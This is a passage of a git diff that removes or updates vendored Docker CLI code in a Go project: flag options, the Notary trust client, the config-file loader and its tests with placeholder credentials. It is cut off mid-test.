// import "github.com/docker/docker/cli" import ( "fmt" diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go deleted file mode 100644 index 9b6940f6bd..0000000000 --- a/vendor/github.com/docker/docker/cli/flags/client.go +++ /dev/null @@ -1,13 +0,0 @@ -package flags - -// ClientOptions are the options used to configure the client cli -type ClientOptions struct { - Common *CommonOptions - ConfigDir string - Version bool -} - -// NewClientOptions returns a new ClientOptions -func NewClientOptions() *ClientOptions { - return &ClientOptions{Common: NewCommonOptions()} -} diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go deleted file mode 100644 index 81eaa38f43..0000000000 --- a/vendor/github.com/docker/docker/cli/flags/common_test.go +++ /dev/null @@ -1,42 +0,0 @@ -package flags - -import ( - "path/filepath" - "testing" - - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/pflag" -) - -func TestCommonOptionsInstallFlags(t *testing.T) { - flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) - opts := NewCommonOptions() - opts.InstallFlags(flags) - - err := flags.Parse([]string{ - "--tlscacert=\"/foo/cafile\"", - "--tlscert=\"/foo/cert\"", - "--tlskey=\"/foo/key\"", - }) - assert.NilError(t, err) - assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile") - assert.Equal(t, opts.TLSOptions.CertFile, "/foo/cert") - assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key") -} - -func defaultPath(filename string) string { - return filepath.Join(cliconfig.ConfigDir(), filename) -} - -func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { - flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) - opts := NewCommonOptions() - opts.InstallFlags(flags) - - err := flags.Parse([]string{}) - assert.NilError(t, err) - assert.Equal(t, opts.TLSOptions.CAFile, 
defaultPath("ca.pem")) - assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem")) - assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem")) -} diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go index 8ee02c8429..e1ff02d2e9 100644 --- a/vendor/github.com/docker/docker/cli/required.go +++ b/vendor/github.com/docker/docker/cli/required.go @@ -1,9 +1,9 @@ -package cli +package cli // import "github.com/docker/docker/cli" import ( - "fmt" "strings" + "github.com/pkg/errors" "github.com/spf13/cobra" ) @@ -14,10 +14,10 @@ func NoArgs(cmd *cobra.Command, args []string) error { } if cmd.HasSubCommands() { - return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) + return errors.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n")) } - return fmt.Errorf( + return errors.Errorf( "\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", cmd.CommandPath(), cmd.CommandPath(), @@ -25,72 +25,3 @@ func NoArgs(cmd *cobra.Command, args []string) error { cmd.Short, ) } - -// RequiresMinArgs returns an error if there is not at least min args -func RequiresMinArgs(min int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) >= min { - return nil - } - return fmt.Errorf( - "\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - min, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// RequiresMaxArgs returns an error if there is not at most max args -func RequiresMaxArgs(max int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) <= max { - return nil - } - return fmt.Errorf( - "\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - max, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// RequiresRangeArgs returns an error if there is not at least min args and at most max 
args -func RequiresRangeArgs(min int, max int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) >= min && len(args) <= max { - return nil - } - return fmt.Errorf( - "\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - min, - max, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} - -// ExactArgs returns an error if there is not the exact number of args -func ExactArgs(number int) cobra.PositionalArgs { - return func(cmd *cobra.Command, args []string) error { - if len(args) == number { - return nil - } - return fmt.Errorf( - "\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage: %s\n\n%s", - cmd.CommandPath(), - number, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } -} diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go deleted file mode 100644 index 51914f74b0..0000000000 --- a/vendor/github.com/docker/docker/cli/trust/trust.go +++ /dev/null @@ -1,232 +0,0 @@ -package trust - -import ( - "encoding/json" - "fmt" - "net" - "net/http" - "net/url" - "os" - "path" - "path/filepath" - "time" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/registry/client/auth" - "github.com/docker/distribution/registry/client/auth/challenge" - "github.com/docker/distribution/registry/client/transport" - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/registry" - "github.com/docker/go-connections/tlsconfig" - "github.com/docker/notary" - "github.com/docker/notary/client" - "github.com/docker/notary/passphrase" - "github.com/docker/notary/storage" - "github.com/docker/notary/trustmanager" - "github.com/docker/notary/trustpinning" - "github.com/docker/notary/tuf/data" - 
"github.com/docker/notary/tuf/signed" -) - -var ( - // ReleasesRole is the role named "releases" - ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases") -) - -func trustDirectory() string { - return filepath.Join(cliconfig.ConfigDir(), "trust") -} - -// certificateDirectory returns the directory containing -// TLS certificates for the given server. An error is -// returned if there was an error parsing the server string. -func certificateDirectory(server string) (string, error) { - u, err := url.Parse(server) - if err != nil { - return "", err - } - - return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil -} - -// Server returns the base URL for the trust server. -func Server(index *registrytypes.IndexInfo) (string, error) { - if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" { - urlObj, err := url.Parse(s) - if err != nil || urlObj.Scheme != "https" { - return "", fmt.Errorf("valid https URL required for trust server, got %s", s) - } - - return s, nil - } - if index.Official { - return registry.NotaryServer, nil - } - return "https://" + index.Name, nil -} - -type simpleCredentialStore struct { - auth types.AuthConfig -} - -func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) { - return scs.auth.Username, scs.auth.Password -} - -func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string { - return scs.auth.IdentityToken -} - -func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) { -} - -// GetNotaryRepository returns a NotaryRepository which stores all the -// information needed to operate on a notary repository. -// It creates an HTTP transport providing authentication support. 
-func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) { - server, err := Server(repoInfo.Index) - if err != nil { - return nil, err - } - - var cfg = tlsconfig.ClientDefault() - cfg.InsecureSkipVerify = !repoInfo.Index.Secure - - // Get certificate base directory - certDir, err := certificateDirectory(server) - if err != nil { - return nil, err - } - logrus.Debugf("reading certificate directory: %s", certDir) - - if err := registry.ReadCertsDirectory(cfg, certDir); err != nil { - return nil, err - } - - base := &http.Transport{ - Proxy: http.ProxyFromEnvironment, - Dial: (&net.Dialer{ - Timeout: 30 * time.Second, - KeepAlive: 30 * time.Second, - DualStack: true, - }).Dial, - TLSHandshakeTimeout: 10 * time.Second, - TLSClientConfig: cfg, - DisableKeepAlives: true, - } - - // Skip configuration headers since request is not going to Docker daemon - modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{}) - authTransport := transport.NewTransport(base, modifiers...) 
- pingClient := &http.Client{ - Transport: authTransport, - Timeout: 5 * time.Second, - } - endpointStr := server + "/v2/" - req, err := http.NewRequest("GET", endpointStr, nil) - if err != nil { - return nil, err - } - - challengeManager := challenge.NewSimpleManager() - - resp, err := pingClient.Do(req) - if err != nil { - // Ignore error on ping to operate in offline mode - logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err) - } else { - defer resp.Body.Close() - - // Add response to the challenge manager to parse out - // authentication header and register authentication method - if err := challengeManager.AddResponse(resp); err != nil { - return nil, err - } - } - - scope := auth.RepositoryScope{ - Repository: repoInfo.FullName(), - Actions: actions, - Class: repoInfo.Class, - } - creds := simpleCredentialStore{auth: authConfig} - tokenHandlerOptions := auth.TokenHandlerOptions{ - Transport: authTransport, - Credentials: creds, - Scopes: []auth.Scope{scope}, - ClientID: registry.AuthClientID, - } - tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) - basicHandler := auth.NewBasicHandler(creds) - modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler))) - tr := transport.NewTransport(base, modifiers...) 
- - return client.NewNotaryRepository( - trustDirectory(), - repoInfo.FullName(), - server, - tr, - getPassphraseRetriever(streams), - trustpinning.TrustPinConfig{}) -} - -func getPassphraseRetriever(streams command.Streams) notary.PassRetriever { - aliasMap := map[string]string{ - "root": "root", - "snapshot": "repository", - "targets": "repository", - "default": "repository", - } - baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap) - env := map[string]string{ - "root": os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"), - "snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - "targets": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - "default": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"), - } - - return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) { - if v := env[alias]; v != "" { - return v, numAttempts > 1, nil - } - // For non-root roles, we can also try the "default" alias if it is specified - if v := env["default"]; v != "" && alias != data.CanonicalRootRole { - return v, numAttempts > 1, nil - } - return baseRetriever(keyName, alias, createNew, numAttempts) - } -} - -// NotaryError formats an error message received from the notary service -func NotaryError(repoName string, err error) error { - switch err.(type) { - case *json.SyntaxError: - logrus.Debugf("Notary syntax error: %s", err) - return fmt.Errorf("Error: no trust data available for remote repository %s. 
Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName) - case signed.ErrExpired: - return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err) - case trustmanager.ErrKeyNotFound: - return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err) - case storage.NetworkError: - return fmt.Errorf("Error: error contacting notary server: %v", err) - case storage.ErrMetaNotFound: - return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err) - case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType: - return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err) - case signed.ErrNoKeys: - return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err) - case signed.ErrLowVersion: - return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err) - case signed.ErrRoleThreshold: - return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err) - case client.ErrRepositoryNotExist: - return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err) - case signed.ErrInsufficientSignatures: - return fmt.Errorf("Error: could not produce valid signature for %s. 
If Yubikey was used, was touch input provided?: %v", repoName, err) - } - - return err -} diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go deleted file mode 100644 index d81bf86b7a..0000000000 --- a/vendor/github.com/docker/docker/cliconfig/config.go +++ /dev/null @@ -1,120 +0,0 @@ -package cliconfig - -import ( - "fmt" - "io" - "os" - "path/filepath" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/pkg/homedir" -) - -const ( - // ConfigFileName is the name of config file - ConfigFileName = "config.json" - configFileDir = ".docker" - oldConfigfile = ".dockercfg" -) - -var ( - configDir = os.Getenv("DOCKER_CONFIG") -) - -func init() { - if configDir == "" { - configDir = filepath.Join(homedir.Get(), configFileDir) - } -} - -// ConfigDir returns the directory the configuration file is stored in -func ConfigDir() string { - return configDir -} - -// SetConfigDir sets the directory the configuration file is stored in -func SetConfigDir(dir string) { - configDir = dir -} - -// NewConfigFile initializes an empty configuration file for the given filename 'fn' -func NewConfigFile(fn string) *configfile.ConfigFile { - return &configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - HTTPHeaders: make(map[string]string), - Filename: fn, - } -} - -// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from -// a non-nested reader -func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { - configFile := configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - } - err := configFile.LegacyLoadFromReader(configData) - return &configFile, err -} - -// LoadFromReader is a convenience function that creates a ConfigFile object from -// a reader -func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) { - configFile := configfile.ConfigFile{ - 
AuthConfigs: make(map[string]types.AuthConfig), - } - err := configFile.LoadFromReader(configData) - return &configFile, err -} - -// Load reads the configuration files in the given directory, and sets up -// the auth config information and returns values. -// FIXME: use the internal golang config parser -func Load(configDir string) (*configfile.ConfigFile, error) { - if configDir == "" { - configDir = ConfigDir() - } - - configFile := configfile.ConfigFile{ - AuthConfigs: make(map[string]types.AuthConfig), - Filename: filepath.Join(configDir, ConfigFileName), - } - - // Try happy path first - latest config file - if _, err := os.Stat(configFile.Filename); err == nil { - file, err := os.Open(configFile.Filename) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) - } - defer file.Close() - err = configFile.LoadFromReader(file) - if err != nil { - err = fmt.Errorf("%s - %v", configFile.Filename, err) - } - return &configFile, err - } else if !os.IsNotExist(err) { - // if file is there but we can't stat it for any reason other - // than it doesn't exist then stop - return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err) - } - - // Can't find latest config file so check for the old one - confFile := filepath.Join(homedir.Get(), oldConfigfile) - if _, err := os.Stat(confFile); err != nil { - return &configFile, nil //missing file is not an error - } - file, err := os.Open(confFile) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", confFile, err) - } - defer file.Close() - err = configFile.LegacyLoadFromReader(file) - if err != nil { - return &configFile, fmt.Errorf("%s - %v", confFile, err) - } - - if configFile.HTTPHeaders == nil { - configFile.HTTPHeaders = map[string]string{} - } - return &configFile, nil -} diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go deleted file mode 100644 index d8a099ab58..0000000000 --- 
a/vendor/github.com/docker/docker/cliconfig/config_test.go +++ /dev/null @@ -1,621 +0,0 @@ -package cliconfig - -import ( - "io/ioutil" - "os" - "path/filepath" - "strings" - "testing" - - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/pkg/homedir" -) - -func TestEmptyConfigDir(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - SetConfigDir(tmpHome) - - config, err := Load("") - if err != nil { - t.Fatalf("Failed loading on empty config dir: %q", err) - } - - expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName) - if config.Filename != expectedConfigFilename { - t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestMissingFile(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on missing file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestSaveFileToDirs(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - tmpHome += "/.docker" - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on missing file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestEmptyFile(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - if err := ioutil.WriteFile(fn, []byte(""), 0600); err != nil { - t.Fatal(err) - } - - _, err = 
Load(tmpHome) - if err == nil { - t.Fatalf("Was supposed to fail") - } -} - -func TestEmptyJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - if err := ioutil.WriteFile(fn, []byte("{}"), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - // Now save it and make sure it shows up in new form - saveConfigAndValidateNewFormat(t, config, tmpHome) -} - -func TestOldInvalidsAuth(t *testing.T) { - invalids := map[string]string{ - `username = test`: "The Auth config file is empty", - `username -password`: "Invalid Auth config file", - `username = test -email`: "Invalid auth configuration file", - } - - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - for content, expectedError := range invalids { - fn := filepath.Join(tmpHome, oldConfigfile) - if err := ioutil.WriteFile(fn, []byte(content), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - // Use Contains instead of == since the file name will change each time - if err == nil || !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Should have failed\nConfig: %v\nGot: %v\nExpected: %v", config, err, expectedError) - } - - } -} - -func TestOldValidAuth(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `username = am9lam9lOmhlbGxv - email = 
user@example.com` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatal(err) - } - - // defaultIndexserver is https://index.docker.io/v1/ - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestOldJSONInvalid(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `{"https://index.docker.io/v1/":{"auth":"test","email":"user@example.com"}}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - // Use Contains instead of == since the file name will change each time - if err == nil || !strings.Contains(err.Error(), "Invalid auth configuration file") { - t.Fatalf("Expected an error got : %v, %v", config, err) - } -} - -func TestOldJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - homeKey := homedir.Key() - homeVal := homedir.Get() - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpHome) - - fn := filepath.Join(tmpHome, oldConfigfile) - js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - if err := 
ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv", - "email": "user@example.com" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n'%s'\n not \n'%s'\n", configStr, expConfStr) - } -} - -func TestNewJSON(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestNewJSONNoEmail(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := ` { 
"auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } } }` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - - expConfStr := `{ - "auths": { - "https://index.docker.io/v1/": { - "auth": "am9lam9lOmhlbGxv" - } - } -}` - - if configStr != expConfStr { - t.Fatalf("Should have save in new form: \n%s\n not \n%s", configStr, expConfStr) - } -} - -func TestJSONWithPsFormat(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { - t.Fatalf("Unknown ps format: %s\n", config.PsFormat) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"psFormat":`) || - !strings.Contains(configStr, "{{.ID}}") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -func TestJSONWithCredentialStore(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - 
fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "credsStore": "crazy-secure-storage" -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.CredentialsStore != "crazy-secure-storage" { - t.Fatalf("Unknown credential store: %s\n", config.CredentialsStore) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"credsStore":`) || - !strings.Contains(configStr, "crazy-secure-storage") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -func TestJSONWithCredentialHelpers(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - fn := filepath.Join(tmpHome, ConfigFileName) - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "credHelpers": { "images.io": "images-io", "containers.com": "crazy-secure-storage" } -}` - if err := ioutil.WriteFile(fn, []byte(js), 0600); err != nil { - t.Fatal(err) - } - - config, err := Load(tmpHome) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.CredentialHelpers == nil { - t.Fatal("config.CredentialHelpers was nil") - } else if config.CredentialHelpers["images.io"] != "images-io" || - config.CredentialHelpers["containers.com"] != "crazy-secure-storage" { - t.Fatalf("Credential helpers not deserialized properly: %v\n", config.CredentialHelpers) - } - - // Now save it and make sure it shows up in new form - configStr := saveConfigAndValidateNewFormat(t, config, tmpHome) - if !strings.Contains(configStr, `"credHelpers":`) || - !strings.Contains(configStr, 
"images.io") || - !strings.Contains(configStr, "images-io") || - !strings.Contains(configStr, "containers.com") || - !strings.Contains(configStr, "crazy-secure-storage") { - t.Fatalf("Should have save in new form: %s", configStr) - } -} - -// Save it and make sure it shows up in new form -func saveConfigAndValidateNewFormat(t *testing.T, config *configfile.ConfigFile, homeFolder string) string { - if err := config.Save(); err != nil { - t.Fatalf("Failed to save: %q", err) - } - - buf, err := ioutil.ReadFile(filepath.Join(homeFolder, ConfigFileName)) - if err != nil { - t.Fatal(err) - } - if !strings.Contains(string(buf), `"auths":`) { - t.Fatalf("Should have save in new form: %s", string(buf)) - } - return string(buf) -} - -func TestConfigDir(t *testing.T) { - tmpHome, err := ioutil.TempDir("", "config-test") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpHome) - - if ConfigDir() == tmpHome { - t.Fatalf("Expected ConfigDir to be different than %s by default, but was the same", tmpHome) - } - - // Update configDir - SetConfigDir(tmpHome) - - if ConfigDir() != tmpHome { - t.Fatalf("Expected ConfigDir to %s, but was %s", tmpHome, ConfigDir()) - } -} - -func TestConfigFile(t *testing.T) { - configFilename := "configFilename" - configFile := NewConfigFile(configFilename) - - if configFile.Filename != configFilename { - t.Fatalf("Expected %s, got %s", configFilename, configFile.Filename) - } -} - -func TestJSONReaderNoFile(t *testing.T) { - js := ` { "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } } }` - - config, err := LoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } - -} - -func TestOldJSONReaderNoFile(t *testing.T) { - js := 
`{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}` - - config, err := LegacyLoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - ac := config.AuthConfigs["https://index.docker.io/v1/"] - if ac.Username != "joejoe" || ac.Password != "hello" { - t.Fatalf("Missing data from parsing:\n%q", config) - } -} - -func TestJSONWithPsFormatNoFile(t *testing.T) { - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv", "email": "user@example.com" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - config, err := LoadFromReader(strings.NewReader(js)) - if err != nil { - t.Fatalf("Failed loading on empty json file: %q", err) - } - - if config.PsFormat != `table {{.ID}}\t{{.Label "com.docker.label.cpu"}}` { - t.Fatalf("Unknown ps format: %s\n", config.PsFormat) - } - -} - -func TestJSONSaveWithNoFile(t *testing.T) { - js := `{ - "auths": { "https://index.docker.io/v1/": { "auth": "am9lam9lOmhlbGxv" } }, - "psFormat": "table {{.ID}}\\t{{.Label \"com.docker.label.cpu\"}}" -}` - config, err := LoadFromReader(strings.NewReader(js)) - err = config.Save() - if err == nil { - t.Fatalf("Expected error. 
